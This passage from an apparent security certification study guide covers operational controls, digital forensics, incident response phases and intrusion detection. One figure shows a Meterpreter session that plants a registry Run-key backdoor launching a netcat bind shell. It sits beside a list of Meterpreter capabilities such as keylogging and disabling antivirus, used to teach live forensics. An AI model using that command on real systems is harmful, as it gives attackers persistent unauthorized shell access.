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transactions, they must convince another party to act in concert. Collusion is the term 
used for the two parties conspiring to undermine the security of the transaction. The 
classic action movie example of separation of duties involves two keys, a nuclear 
sub, and a rogue captain. 


LEARN BY EXAMPLE 

Separation of Duties 

Separation of duties is a hard lesson to learn for many organizations, but many only needed to learn 
this lesson once. One such organization had a relatively small and fledgling security department that 
was created as a result of regulatory compliance mandates. Most of the other departments were fairly 
antagonistic toward this new department because it simply cobbled together various perceived security 
functions and was not mindfully built. The original intent was for the department to serve primarily 
in an advisory capacity regarding all things in security, and for the department not to have operational 
responsibilities regarding changes. The result meant that security ran a lot of vulnerability scans, and 
took these to operations for resolution. Often operations staff members were busy with more pressing 
matters than patch installations, the absence of which posed little perceived threat. 

Ultimately, because of their incessant nagging, the security department was given the, thankless 
if ever there was one, task of enterprise patch management for all but the most critical systems. 
Though this worked fine for a while, eventually, one of the security department staff realized that 
his performance review depended upon his timely remediation of missing patches, and, in addition 
to being the person that installed the patches, he was also the person that reported whether patches 
were missing. Further scrutiny was applied when management thought it odd that he reported 
significantly less missing patches than all of his security department colleagues. Upon review 
it was determined that though the employee had indeed acted unethically, it was beneficial in 
bringing the need for separation of duties to light. Though many departments have not had such an 
egregious breach of conduct, it is important to be mindful of those with audit capabilities also being 
operationally responsible for what they are auditing. The moral of the story: Quis custodiet ipsos 
custodes?[l] Who watches the watchers? 


Rotation of Duties/Job Rotation 

Rotation of Duties, also known as job rotation or rotation of responsibilities, pro- 
vides an organization with a means to help mitigate the risk associated with any one 
individual having too many privileges. Rotation of duties simply requires that one 
person does not perform critical functions or responsibilities without interruption. 
There are multiple issues that rotation of duties can help begin to address. One issue 
addressed by job rotation is the “hit by a bus” scenario: imagine, morbid as it is, that 
one individual in the organization is hit by a bus on their way to work. If the opera- 
tional impact of the loss of an individual would be too great, then perhaps one way to 
assuage this impact would be to ensure that there is additional depth of coverage for 
this individual’s responsibilities. 

Rotation of duties can also mitigate fraud. Over time some employees can develop 
a sense of ownership and entitlement to the systems and applications they work 
on. Unfortunately, this sense of ownership can lead to the employee’s finding and 
exploiting a means of defrauding the company with little to no chance of arousing 
suspicion. One of the best ways to detect this fraudulent behavior is to require that 
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responsibilities that could lead to fraud be frequently rotated amongst multiple people. 
In addition to the increased detection capabilities, the fact that responsibilities are 
routinely rotated deters fraud. 


EXAM WARNING 


Though job or responsibility rotation is an important control, this, like many other controls, is 
often compared against the cost of implementing the control. Many organizations will opt for not 
implementing rotation of duties because of the cost associated with implementation. For the exam, 
be certain to appreciate that cost is always a consideration, and can trump the implementation of 
some controls. 


Mandatory Leave/Forced Vacation 

An additional operational control that is closely related to rotation of duties is 
that of mandatory leave, also known as forced vacation. Though there are various 
justifications for requiring employees to be away from work, the primary security 
considerations are similar to that addressed by rotation of duties; reducing or detecting 
personnel single points of failure, and detection and deterrence of fraud. Discovering 
a lack of depth in personnel with critical skills can help organizations understand risks 
associated with employees unavailable for work due to unforeseen circumstances. 
Forcing all employees to take leave can identify areas where depth of coverage is 
lacking. Further, requiring employees to be away from work while it is still operating 
can also help discover fraudulent or suspicious behavior. As stated before, the sheer 
knowledge that mandatory leave is a possibility might deter some individuals from 
engaging in the fraudulent behavior in the first place, because of the increased 
likelihood of getting caught. 

Non-Disclosure Agreement (NDA) 

A non-disclosure agreement (NDA) is a work-related contractual agreement that 
ensures that, prior to being given access to sensitive information or data, an individual 
or organization appreciates their legal responsibility to maintain the confidentiality 
of that sensitive information. Job candidates, consultants or contractors often sign 
non-disclosure agreements before they are hired. Non-disclosure agreements are 
largely a directive control. 


NOTE 

Though non-disclosure agreements are commonly now part of the employee orientation process, 
it is vitally important that all departments within an organization appreciate the need for non- 
disclosure agreements. This is especially important for organizations where it is commonplace for 
individual departments to engage with outside consultants and contractors. 
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Background Checks 

Background checks (also known as background investigations or pre-employment 
screening) are an additional administrative control commonly employed by many 
organizations. The majority of background investigations are performed as part of 
a pre-employment screening process. Some organizations perform cursory back- 
ground investigations that include a criminal record check. Others perform more 
in-depth checks, such as verifying employment history, obtaining credit reports, and 
in some cases requiring the submission of a drug screening. 

The sensitivity of the position being filled or data to which the individual will 
have access strongly determines the degree to which this information is scrutinized 
and the depth to which the investigation will report. The overt purpose of these 
pre-employment background investigations is to ensure that persons who will be 
employed have not exhibited behaviors that might suggest they cannot be trusted 
with the responsibilities of the position. Ongoing, or postemployment, investigations 
seek to determine whether the individual continues to be worthy of the trust required 
of their position. Background checks performed in advance of employment serve as 
a preventive control while ongoing repeat background checks constitute a detective 
control and possibly a deterrent. 

PRIVILEGE MONITORING 

The business needs of organizations require that some individuals have privileged 
access to critical systems, or systems that contain sensitive data. These individuals’ 
heightened privileges require both greater scrutiny and more thoughtful controls in 
order to ensure that confidentiality, integrity, and availability remain intact. Some of 
the job functions that warrant greater scrutiny include: account creation/modification/ 
deletion, system reboots, data backup, data restoration, source code access, audit log 
access, security configuration capabilities, etc. 


FORENSICS 

Digital forensics provides a formal approach to dealing with investigations and 
evidence with special consideration of the legal aspects of this process. Foren- 
sics is closely related to incident response, which is covered later in this chapter. 
The main distinction between forensics and incident response is that forensics is 
evidence-centric and typically more closely associated with crimes, while incident 
response is more dedicated to identifying, containing, and recovering from security 
incidents. 

The forensic process must preserve the “crime scene” and the evidence in order 
to prevent unintentionally violating the integrity of either the data or the data’s 
environment. A primary goal of forensics is to prevent unintentional modifica- 
tion of the system. Historically, this integrity focus led investigators to cut a sys- 
tem’s power to preserve the integrity of the state of the hard drive, and prevent an 
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interactive attacker or malicious code from changing behavior in the presence of a 
known investigator. This approach persisted for many years, but is now changing 
due to antiforensics. 


EXAM WARNING 


Always ensure that any forensic actions uphold integrity, and are legal and ethical. 


Antiforensics makes forensic investigation difficult or impossible. One antiforen- 
sic method is malware that is entirely memory-resident, and not installed on the disk 
drive. If an investigator removes power from a system with entirely memory-resident 
malware, all volatile memory including RAM is lost, and evidence is destroyed. 
Because of the investigative value of information available only in volatile memory, 
the current forensic approach favors some degree of live forensics that includes 
taking a bit by bit, or binary image of physical memory, gathering details about 
running processes, and gathering network connection data. 

The general phases of the forensic process are: the identification of potential evi- 
dence; the acquisition of that evidence; analysis of the evidence; and production of 
a report. Acquisition will leverage binary backups and the use of hashing algorithms 
to verify the integrity of the binary images, which we will discuss shortly. When pos- 
sible, the original media should not be used for analysis: a forensically sound binary 
backup should be used. The final step of the forensic process involves the creation of 
a forensic report that details the findings of the analysis phase. 

FORENSIC MEDIA ANALYSIS 

In addition to the valuable data gathered during the live forensic capture, the main 
source of forensic data typically comes from binary images of secondary storage 
and portable storage devices such as hard disk drives, USB flash drives, CDs, DVDs, 
and possibly associated cellular phones and mp3 players. The reason that a binary 
or bit stream image is used is because an exact replica of the original data is needed. 
Normal backup software will only archive allocated data on the active partitions of a 
disk. Normal backups could miss significant data that had been intentionally deleted 
by an attacker; as such, binary images are preferred. 

Here are the four basic types of disk-based forensic data: 

• Allocated space — portions of a disk partition that are marked as actively 
containing data. 

• Unallocated space — portions of a disk partition that do not contain active data. 
This includes portions that have never been allocated, and previously allocated 
portions that have been marked unallocated. If a file is deleted, the portions of 
the disk that held the deleted file are marked as unallocated and made available 
for use. 




354 CHAPTER 8 Domain 7: Security Operations 


• Slack space — data is stored in specific size chunks known as clusters (clusters 
are sometimes also referred to as sectors or blocks). A cluster is the minimum 
size that can be allocated by a file system. If a particular file, or final portion 
of a file, does not require the use of the entire cluster then some extra space 
will exist within the cluster. This leftover space is known as slack space: it may 
contain old data, or can be used intentionally by attackers to hide information. 

• “Bad” blocks/clusters/sectors — hard disks routinely end up with sectors that 
cannot be read due to some physical defect. The sectors marked as bad will be 
ignored by the operating system since no data could be read in those defective 
portions. Attackers could intentionally mark sectors or clusters as being bad in 
order to hide data within this portion of the disk. 

Given the disk level tricks that an attacker could use to hide forensically interest- 
ing information, a binary backup tool is used rather than a more traditional backup 
tool that would only be concerned with allocated space. There are numerous tools 
that can be used to create this binary backup including free tools such as dd and 
windd as well as commercial tools such as Ghost (when run with specific non-default 
switches enabled), AccessData’s FTK, or Guidance Software’s EnCase. 


LEARN BY EXAMPLE 

Live Forensics 

While forensics investigators traditionally removed power from a system, the typical approach 
now is to gather volatile data. Acquiring volatile data is called live forensics, as opposed to the post 
mortem forensics associated with acquiring a binary disk image from a powered down system. One 
attack tool stands out as having brought the need for live forensics into full relief. 

Metasploit is an extremely popular free and open source exploitation framework. A strong 
core group of developers led by HD Moore have consistently kept it on the cutting edge of 
attack techniques. One of the most significant achievements of the Metasploit framework is the 
modularization of the underlying components of an attack. This modularization allows for exploit 
developers to focus on their core competency without having to expend energy on distribution or 
even developing a delivery, targeting, and payload mechanism for their exploit; Metasploit provides 
reusable components to limit extra work. 

A payload is what Metasploit does after successfully exploiting a target; Meterpreter is one 
of the most powerful Metasploit payloads. As an example of some of the capabilities provided by 
Meterpreter, Figure 8. 1 shows the password hashes of a compromised computer being dumped to 
the attacker’s machine. These password hashes can then be fed into a password cracker that would 
eventually figure out the associated password. Or the password hashes might be capable of being 
used directly in Metasploit’ s PSExec exploit module, which is an implementation of functionality 
provided by Syslnternal’s (now owned by Microsoft) PSExec, but bolstered to support Pass the 
Hash functionality. Information on Microsoft’s PSExec can be found at http://technet.microsoft. 
com/en-us/sysinternals/bb897553.aspx. Further details on Pass the Hash techniques can be found at 
http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit. 

In addition to dumping password hashes, Meterpreter provides such features as: 

• Command execution on the remote system 

• Uploading or downloading of files 

• Screen capture 

• Keystroke logging 
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• Disabling the firewall 

• Disabling antivirus 

• Registry viewing and modification (as seen in Figure 8.2) 

• And much more: Meterpreter’s capabilities are updated regularly 

In addition to the above features, Meterpreter was designed with detection evasion in mind. 
Meterpreter can provide almost all of the functionalities listed above without creating a new file on 
the victim system. Meterpreter runs entirely within the context of the exploited victim process, and 
all information is stored in physical memory rather than on the hard disk. 

Imagine an attacker has performed all of the actions detailed above, and the forensic investigator 
removed the power supply from the compromised machine, destroying volatile memory: there 
would be little to no information for the investigator to analyze. The possibility of Metasploit’s 
Meterpreter payload being used in a compromise makes volatile data acquisition a necessity in the 
current age of exploitation. 


B i root@bt: /pentest/exploits/framework3 - Shell - Konsole ■ '■ '•> 



FIGURE 8.1 Dumping Password Hashes with Meterpreter 




meterpreter > reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run 
Enumerating: HKLM\Software\Microsoft\Windows\CurrentVersion\Run 

No children, 
meterpreter > 

meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v backdoor -d "C:\\nc.ex 
e -l -p 8888 -e cmd.exe" 

Successful set backdoor, 
meterpreter > 

meterpreter > reg enumkey -k HKLMWSoftwareWMicrosoftWWindowsWCurrentVersionWRun 
Enumerating: HKLM\Software\Microsoft\Windows\CurrentVersion\Run 

Values (1): 

backdoor 

meterpreter > 

meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v backdoor 
Key: HKLM\Software\Microsoft\Windows\CurrentVersion\Run 
Name: backdoor 
Type: REG_SZ 

Data: C:\nc.exe -l -p 8888 -e cmd.exe 
meterpreter > 
meterpreter > | 


FIGURE 8.2 Dumping the Registry with Meterpreter 
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NETWORK FORENSICS 

Network forensics is the study of data in motion, with special focus on gathering evi- 
dence via a process that will support admission into court. This means the integrity 
of the data is paramount, as is the legality of the collection process. Network foren- 
sics is closely related to network intrusion detection: the difference is the former is 
legal-focused, and the latter is operations-focused. Network forensics is described as: 
“Traditionally, computer forensics has focused on hie recovery and filesystem analy- 
sis performed against system internals or seized storage devices. However, the hard 
drive is only a small piece of the story. These days, evidence almost always traverses 
the network and sometimes is never stored on a hard drive at all. 

With network forensics, the entire contents of e-mails, IM conversations, Web 
surfing activities, and hie transfers can be recovered from network equipment and 
reconstructed to reveal the original transaction. The payload inside the packet at the 
highest layer may end up on disc, but the envelope that got it there is only captured in 
the network traffic. The network protocol data that surrounded each conversation is 
often extremely valuable to the investigator. Network forensics enables investigators 
to piece together a more complete picture using evidence from the entire network 
environment.” [2] 

FORENSIC SOFTWARE ANALYSIS 

Forensic software analysis focuses on comparing or reverse engineering software: 
reverse engineering malware is one of the most common examples. Investigators are 
often presented with a binary copy of a malicious program, and seek to deduce its 
behavior. 

Tools used for forensic software analysis include disassemblers and software 
debuggers. Virtualization software also comes in handy: investigators may 
intentionally infect a virtual operating system with a malware specimen, and then 
closely monitor the resulting behavior. 

EMBEDDED DEVICE FORENSICS 

One of the greatest challenges facing the field of digital forensics is the prolifera- 
tion of consumer-grade electronic hardware and embedded devices. While forensic 
investigators have had decades to understand and develop tools and techniques to 
analyze magnetic disks, newer technologies such as Solid State Drives (SSDs) lack 
both forensic understanding and forensic tools capable of analysis. 

Vassilakopoulos Xenofon discussed this challenge in his paper GPS Forensics, A 
systemic approach for GPS evidence acquisition through forensics readiness: “The 
held of digital forensics has long been cantered on traditional media like hard drive. 
Being the most common digital storage device in distribution it is easy to see how 
they have become a primary point of evidence. However, as technology brings digi- 
tal storage to be more and more of larger storage capacity, forensic examiners have 
needed to prepare for a change in what types of devices hold a digital fingerprint. 
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Cell phones, GPS receiver and PDA (Personal Digital Assistant) devices are so com- 
mon that they have become standard in today’s digital examinations. These small 
devices carry a large burden for the forensic examiner, with different handling rules 
from scene to lab and with the type of data being as diverse as the suspects they come 
from. Handheld devices are rooted in their own operating systems, file systems, file 
formats, and methods of communication. Dealing with this creates unique problems 
for examiners.” [3] 

ELECTRONIC DISCOVERY (eDISCOVERY) 

Electronic discovery, or eDiscovery, pertains to legal counsel gaining access to 
pertinent electronic information during the pre-trial discovery phase of civil legal 
proceedings. The general purpose of discovery is to gather potential evidence that 
will allow for building a case. Electronic discovery differs from traditional discovery 
simply in that eDiscovery seeks ESI, or electronically stored information, which is 
typically acquired via a forensic investigation. While the difference between traditional 
discovery and eDiscovery might seem miniscule, given the potentially vast quantities 
of electronic data stored by organizations, eDiscovery can prove logistically and 
financially cumbersome. 

Some of the challenges associated with eDiscovery stem from the seemingly 
innocuous backup policies of organizations. While long term storage of computer 
information has generally been thought to be a sound practice, this data is discoverable. 
To be discoverable, which simply means open for legal discovery, ESI does not need 
to be conveniently accessible or transferable. The onus falls to the organization to 
produce the data to opposing counsel with little to no regard to the cost incurred by 
the organization to actually provide the ESI. 

Appropriate data retention policies as well as perhaps software and systems 
designed to facilitate eDiscovery can greatly reduce the burden felt by the organiza- 
tion when required to provide ESI for discovery. When considering data retention 
policies, consider not only how long must information be kept, which has typically 
been the focus, but also how long information needs to be accessible to the organi- 
zation. Any data for which there is no longer need, should be appropriately purged 
according to the data retention policy. Data no longer maintained due to policy is 
necessarily not accessible for discovery purposes. 

Please see the Legal and Regulatory Issues section of Chapter 2, Domain 1: 
Security and Risk Management for more information on related legal issues. 


INCIDENT RESPONSE MANAGEMENT 

Although this chapter has provided many operational security measures that would 
aid in the prevention of a security incident, these measures will only serve to decrease 
the likelihood and frequency with which security incidents are experienced. All 
organizations will experience security incidents; about this fact there is little doubt. 
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Because of the certainty of security incidents eventually impacting organizations, 
there is a great need to be equipped with a regimented and tested methodology for 
identifying and responding to these incidents. 

We will first define some basic terms associated with incident response. To be 
able to determine whether an incident has occurred or is occurring, security events 
are reviewed. Events are any observable data associated with systems or networks. 
A security incident exists if the events suggest that violation of an organization’s 
security posture has or is likely to occur. Security incidents can run the gamut from 
a basic policy violation to an insider exfiltrating millions of credit card numbers. 
Incident handling or incident response are the terms most commonly associated with 
how an organization proceeds to identify, react, and recover from security incidents. 
Finally, a Computer Security Incident Response Team ( CSIRT) is a term used for the 
group that is tasked with monitoring, identifying, and responding to security inci- 
dents. The overall goal of the incident response plan is to allow the organization to 
control the cost and damage associated with incidents, and to make the recovery of 
impacted systems quicker. 

INCIDENT RESPONSE 

Responding to incidents can be a highly stressful situation. In these high-pressure 
times it is easy to focus on resolving the issue at hand, overlooking the requirement 
for detailed, thorough documentation. If every response action taken and output 
received is not being documented then the incident responder is working too quickly, 
and is not documenting the incident to the degree that may be required by legal 
proceedings. It is difficult to know at the beginning of an investigation whether or not 
the investigation will eventually land in a court of law. An incident responder should 
not need to recall the details of an incident that occurred in the past from memory: 
documentation written while handling the incident should provide all necessary 
details. 

METHODOLOGY 

Different books and organizations may use different terms and phases associated 
with the incident response process; this section will mirror the terms associated with 
the examination. Though each organization will indeed have a slightly different 
understanding of the phases of incident response, the general tasks performed will 
likely be quite similar among most organizations. 

Figure 8.3 is from the NIST Special Publication 800-61r2: Computer Security 
Incident Handling Guide (see: http://nvlpubs.nist.gov/nistpubs/SpecialPublications/ 
NIST.SP.800-61r2.pdf), which outlines the incident response lifecycle in 4 steps: 

1 . Preparation 

2. Detection and Analysis 

3. Containment, Eradication and Recovery 

4. Post-incident Activity 
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Many incident handling methodologies treat containment, eradication and recov- 
ery as three distinct steps, as we will in this book. Other names for each step are 
sometimes used; the current exam lists a 7-step lifecycle, but (curiously) omits the 
first step in most incident handling methodologies: preparation. Perhaps preparation 
is implied, like the identification portion of AAA systems. We will therefore cover 8 
steps, mapped to the current exam: 

1 . Preparation 

2 . Detection (aka Identification) 

3 . Response (aka Containment) 

4 . Mitigation (aka Eradication) 

5 . Reporting 

6 . Recovery 

7 . Remediation 

8 . Lessons Learned (aka Post-incident Activity, Post Mortem, or Reporting) 

It is important to remember that the final step feeds back into the first step, as 
shown previously in Figure 8.3. An organization may determine that staff members 
were insufficiently trained to handle incidents during lessons learned phase. That les- 
son is then applied to continued preparation, where staff members would be properly 
trained. 

Preparation 

The preparation phase includes steps taken before an incident occurs. These 
include training, writing incident response policies and procedures, providing 
tools such as laptops with sniffing software, crossover cables, original OS media, 
removable drives, etc. Preparation should include anything that may be required to 
handle an incident, or which will make incident response faster and more effective. 
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Action 

Completed 

Detection and Analysis 

1 . 

Determine whether an incident has occurred 


1.1 

Analyze the precursors and indicators 


1.2 

Look for correlating information 


1.3 

Perform research (e.g., search engines, knowledge base) 


1.4 

As soon as the handler believes an incident has occurred, begin documenting 
the investigation and gathering evidence 


2. 

Prioritize handling the incident based on the relevant factors (functional impact, information 
impact, recoverability effort, etc.) 


3. 

Report the incident to the appropriate internal personnel and external organizations 


Containment, Eradication, and Recovery 

4. 

Acquire, preserve, secure, and document evidence 


5. 

Contain the incident 


6. 

Eradicate the incident 


6.1 

Identify and mitigate all vulnerabilities that were exploited 


6.2 

Remove malware, inappropriate materials, and other components 


6.3 

If more affected hosts are discovered (e.g., new malware infections), repeat 
the Detection and Analysis steps (1 .1 , 1 .2) to identify all other affected hosts, then 
contain (5) and eradicate (6) the incident for them 


7. 

Recover from the incident 


7.1 

Return affected systems to an operationally ready state 


7.2 

Confirm that the affected systems are functioning normally 


7.3 

If necessary, implement additional monitoring to look for future related activity 


Post-Incident Activity 

8. 

Create a follow-up report 


9. 

Hold a lessons learned meeting (mandatory for major incidents, optional otherwise) 



FIGURE 8.4 Incident Handling Checklist [5] 


One preparation step is preparing an incident handling checklist. Figure 8.4 is an 
incident handling checklist from NIST Special Publication 800-61r2. 

Detection 

One of the most important steps in the incident response process is the detection 
phase. Detection (also called identification) is the phase in which events are analyzed 
in order to determine whether these events might comprise a security incident. With- 
out strong detective capabilities built into the information systems, the organization 
has little hope of being able to effectively respond to information security incidents 
in a timely fashion. Organizations should have a regimented and, preferably, auto- 
mated fashion for pulling events from systems and bringing those events into the 
wider organizational context. Often when events on a particular system are analyzed 
independently and out of context, then an actual incident might easily be overlooked. 
However, with the benefit of seeing those same system logs in the context of the 
larger organization, patterns indicative of an incident might be noticed. An important 
aspect of this phase of incident response is that during the detection phase it is deter- 
mined as to whether an incident is actually occurring or has occurred. It is a rather 
common occurrence for potential incidents to be deemed strange, but innocuous after 
further review. 
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Response 

The response phase (aka containment) of incident response is the point at which 
the incident response team begins interacting with affected systems and attempts 
to keep further damage from occurring as a result of the incident. Responses might 
include taking a system off the network, isolating traffic, powering off the system, or 
other items to control both the scope and severity of the incident. This phase is also 
typically where a binary (bit by bit) forensic backup is made of systems involved in 
the incident. An important trend to understand is that most organizations will now 
capture volatile data before pulling the power plug on a system. 

Always receive permission from management before beginning the response 
phase: offline systems can negatively impact business, and as a result business needs 
often conflict with the needs of information security. The ultimate decision needs to 
come from senior management. 

Response is analogous to emergency medical technicians arriving on the scene 
of a car accident: they seek to stabilize an injured patient (stop their condition from 
worsening); they do not cure the patient. Imagine an incident where a worm has 
infected 12 systems: response includes containment, which means the worm stops 
spreading. No new systems are infected, but the existing infections will exist until 
they are eradicated in the next step. 

Mitigation 

The mitigation phase (aka eradication) involves the process of understanding the 
cause of the incident so that the system can be reliably cleaned and ultimately 
restored to operational status later in the recovery phase. In order for an organiza- 
tion to be able to reliably recover from an incident, the cause of the incident must be 
determined. The cause must be known so that the systems in question can be returned 
to a known good state without significant risk of compromise persisting or reoccur- 
ring. A common occurrence is for organizations to remove the most obvious piece 
of malware affecting a system and think that is sufficient. In reality, the obvious 
malware may only be a symptom, with the cause still undiscovered. 

Once the cause and symptoms are determined then the system is restored to a 
good state and should not be vulnerable to further impact. This will typically involve 
either rebuilding the system from scratch or restoring from a known good backup. 
A key question is whether the known good backup can really be trusted. Root cause 
analysis is key here: it can help develop a timeline of events that lends credence to 
the suggestion of a backup or image known to be good. Another aspect of eradication 
that helps with the prevention of future impact is bolstering defenses of the system. 
If the incident was caused by exploitation of a known vulnerability, then a patch 
would be prudent. However, improving the system’s firewall configuration might 
also be a means to help defend against the same or similar attacks. Once eradication 
has been completed, then the recovery phase begins. 

Reporting 

The reporting phase of incident handling occurs throughout the process, beginning 
with detection. Reporting must begin immediately upon detection of malicious 
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activity. Reporting contains two primary areas of focus: technical and non-technical 
reporting. The incident handling teams must report the technical details of the 
incident as they begin the incident handling process, while maintaining sufficient 
bandwidth to also notify management of serious incidents. A common mistake is 
forgoing the latter while focusing on the technical details of the incident itself: this is 
a mistake. Non-technical stake holders including business and mission owners must 
be notified immediately of any serious incident, and kept up to date as the incident 
handing process progresses. 

More formal reporting begins just before the recovery phase, where technical and 
non-technical stake holders will begin to receive formal reports of the incident as it 
winds down, and staff prepares to recover affected systems and place them back into 
production. 

Recovery 

The recovery phase involves cautiously restoring the system or systems to opera- 
tional status. Typically, the business unit responsible for the system will dictate when 
the system will go back online. Remember to be cognizant of the possibility that the 
infection, attacker, or other threat agent might have persisted through the eradication 
phase. For this reason, close monitoring of the system after it is returned to produc- 
tion is necessary. Further, to make the security monitoring of this system easier, 
strong preference is given to the restoration of operations occurring during off or 
nonpeak production hours. 

Remediation 

Remediation steps occur during the mitigation phase, where vulnerabilities with- 
in the impacted system or systems are mitigated. Remediation continues after that 
phase, and becomes broader. For example: if the root-cause analysis determines that 
a password was stolen and reused: local mitigation steps could include changing the 
compromised password and placing the system back online. Broader remediation 
steps could include requiring dual-factor authentication for all systems accessing 
sensitive data. We will discuss root-cause analysis shortly. 

Lessons Learned 

Unfortunately, the lessons learned phase (also known as post-incident activity, 
reporting, or post mortem) is the one most likely to be neglected in immature inci- 
dent response programs. This fact is unfortunate because the lessons learned phase, 
if done right, is the phase that has the greatest potential to effect a positive change in 
security posture. The goal of the lessons learned phase is to provide a final report on 
the incident, which will be delivered to management. 

Important considerations for this phase are detailing ways in which the identification 
could have occurred sooner, the response could have been quicker or more effective, 
organizational shortcomings that might have contributed to the incident, and potential 
areas for improvement. Though after significant security incidents security personnel 
might have greater attention of the management, now is not the time to exploit this 
focus unduly. If a basic operational change would have significantly increased the 
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organization’s ability to detect, contain, eradicate, or recover from the incident, then 
the final report should detail this fact whether it is a technical or administrative 
measure. 

Feedback from this phase feeds directly into continued preparation, where the 
lessons learned are applied to improve preparation for handling future incidents. 


ROOT-CAUSE ANALYSIS 

To effectively manage security incidents, root-cause analysis must be performed. 
Root-cause analysis attempts to determine the underlying weakness or vulnerability 
that allowed the incident to be realized. Without successful root-cause analysis, the 
victim organization could recover systems in a way that still includes the particular 
weaknesses exploited by the adversary causing the incident. In addition to potentially 
recovering systems with exploitable flaws, another possibility includes reconstituting 
systems from backups or snapshots that have already been compromised. 


OPERATIONAL PREVENTIVE AND DETECTIVE CONTROLS 

Many preventive and detective controls require higher operational support, and are 
a focus of daily operations security. For example: routers and switches tend to have 
comparatively low operational expense (OPEX). Other controls, such as NIDS and 
NIPS, antivirus, and application whitelisting have comparatively higher operational 
expense, and are a focus in this domain. 


INTRUSION DETECTION SYSTEMS AND INTRUSION 
PREVENTION SYSTEMS 

An Intrusion Detection System (IDS) is a detective device designed to detect mali- 
cious (including policy-violating) actions. An Intrusion Prevention System (IPS) is a 
preventive device designed to prevent malicious actions. There are two basic types of 
IDSs and IPSs: network-based and host-based. 


NOTE 

Most of the following examples reference IDSs, for simplicity. The examples also apply to IPSs; the 
difference is the attacks are detected by an IDS and prevented by an IPS. 


IDS and IPS Event Types 

There are four types of IDS events: true positive, true negative, false positive, and 
false negative. We will use two streams of traffic, the Conficker worm (a prevalent 
network worm in 2009) and a user surfing the Web, to illustrate these events. 
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• True Positive: Conficker worm is spreading on a trusted network, and NIDS 
alerts 

• True Negative: User surfs the Web to an allowed site, and NIDS is silent 

• False Positive: User surfs the Web to an allowed site, and NIDS alerts 

• False Negative: Conficker worm is spreading on a trusted network, and NIDS is 


silent 


The goal is to have only true positives and true negatives, but most IDSs have 
false positives and false negatives as well. False positives waste time and resources, 
as monitoring staff spends time investigating non-malicious events. A false negative 
is arguably the worst-case scenario: malicious network traffic is not prevented or 
detected. 

NIDS and NIPS 

A Network-based Intrusion Detection System (NIDS) detects malicious traffic on a 
network. NIDS usually require promiscuous network access in order to analyze all 
traffic, including all unicast traffic. NIDS are passive devices that do not interfere 
with the traffic they monitor; Figure 8.5 shows a typical NIDS architecture. The 
NIDS sniffs the internal interface of the firewall in read-only mode and sends alerts 
to a NIDS Management server via a different (read/write) network interface. 

The difference between a NIDS and a NIPS is that the NIPS alters the flow of net- 
work traffic. There are two types of NIPS: active response and inline. Architecturally, 
an active response NIPS is like the NIDS in Figure 8.5; the difference is the monitor- 
ing interface is read/write. The active response NIPS may “shoot down” malicious 
traffic via a variety of methods, including forging TCP RST segments to source or 
destination (or both), or sending ICMP port, host, or network unreachable to source. 


NIDS 


NIDS Management 



Read-Only 



The Internet 


Firewall 


Trusted Network 


FIGURE 8.5 NIDS Architecture 


Operational Preventive and Detective Controls 365 


NIPS Management 



The Internet Firewall 

FIGURE 8.6 Inline NIPS Architecture 


NIPS 


Trusted Network 


Snort, a popular open-source NIDS and NIPS (see www.snort.org), has the 
following active response rules: 

• reset_dest: send TCP RST to destination 

• reset_source: send TCP RST to source 

• reset_both: send TCP RST to both the source and destination 

• icmp_net: send ICMP network unreachable to source 

• icmp_host: send ICMP host unreachable to source 

• icmp_port: send ICMP port unreachable to source 

• icmp_all: send ICMP network, host and port unreachable to source 

An inline NIPS is “in line” with traffic, playing the role of a layer 3-7 firewall by 
passing or allowing traffic, as shown in Figure 8.6. 

Note that a NIPS provides defense-in-depth protection in addition to a firewall; 
it is not typically used as a replacement. Also, a false positive by a NIPS is more 
damaging than one by a NIDS: legitimate traffic is denied, which may cause produc- 
tion problems. A NIPS usually has a smaller set of rules compared to a NIDS for this 
reason; only the most trustworthy rules are used. A NIPS is not a replacement for a 
NIDS; many networks use both a NIDS and a NIPS. 

HIDS and HIPS 

Host-based Intrusion Detection Systems (HIDS) and Host-based Intrusion Preven- 
tion Systems (HIPS) are host-based cousins to NIDS and NIPS. They process infor- 
mation within the host. They may process network traffic as it enters the host, but the 
exam’s focus is usually on files and processes. 

A well-known HIDS is Tripwire (see: http://www.tripwire.com/). Tripwire pro- 
tects system integrity by detecting changes to critical operating system hies. Changes 
are detected through a variety of methods, including comparison of cryptographic 
hashes. 
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Pattern Matching 

A Pattern Matching IDS works by comparing events to static signatures. According 
to Cisco, “The worm may also contact the http://www.maxmind.com domain and 
download the geoip.dat. gz and geoip.dat files.”[6] Based on that information, the 
following pattern can be used to detect Conficker: If the strings “geoip.dat. gz” or 
“geoip.dat” appear in Web traffic: alert. 

Pattern Matching works well for detecting known attacks, but usually does poorly 
against new attacks. 

Protocol Behavior 

A Protocol Behavior IDS models the way protocols should work, often by analyzing 
RFCs (Request for Comments). RFC 793 (TCP, see: http://www.ietf.org/rfc/rfc0793. 
txt) describes the TCP flags. A SYN means synchronize, and FIN means finish. One 
flag is used to create a connection, the other to end one. 

Based on analysis of RFC 793, a resulting protocol behavior rule could be “if 
both SYN/FIN flags set in one packet: alert.” Based on the RFC, it makes no sense 
for a single segment to attempt to begin and end a connection. 

Attackers craft such “broken” segments, so Protocol Behavior does detect mali- 
cious traffic. The issue is Hanlon’s Razor, a maxim that reads: “Never attribute to 
malice that which is adequately explained by stupidity.” [7 ] Protocol Behavior also 
detects “stupid” (broken) traffic: applications designed by developers who do not 
read or follow RFCs. This is fairly common: the application “works,” (traffic flows), 
but violates the intent of the RFCs. 


NOTE 

All Information Security Professionals should understand Hanlon’s Razor. There is plenty of 
malice in our world: worms, phishing attacks, identity theft, etc. But there is more brokenness and 
stupidity: most disasters are caused by user error. 


Anomaly Detection 

An Anomaly Detection IDS works by establishing a baseline of normal traffic. The 
Anomaly Detection IDS then ignores that traffic, reporting on traffic that fails to 
meet the baseline. 

Unlike Pattern Matching, Anomaly Detection can detect new attacks. The chal- 
lenge is establishing a baseline of “normal”: this is often straightforward on small 
predictable networks, but can be quite difficult (if not impossible) on large complex 
networks. 

SECURITY INFORMATION AND EVENT MANAGEMENT 

Intrusion Detection Systems (IDS) have long been the primary technical detective 
control wielded by organizations. Though the importance of IDS has not waned, 
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organizations now appreciate that many more sources of data beyond the IDS can 
provide valuable information. These disparate sources of information can provide 
their own data of value; organizations increasingly see value in being able to more 
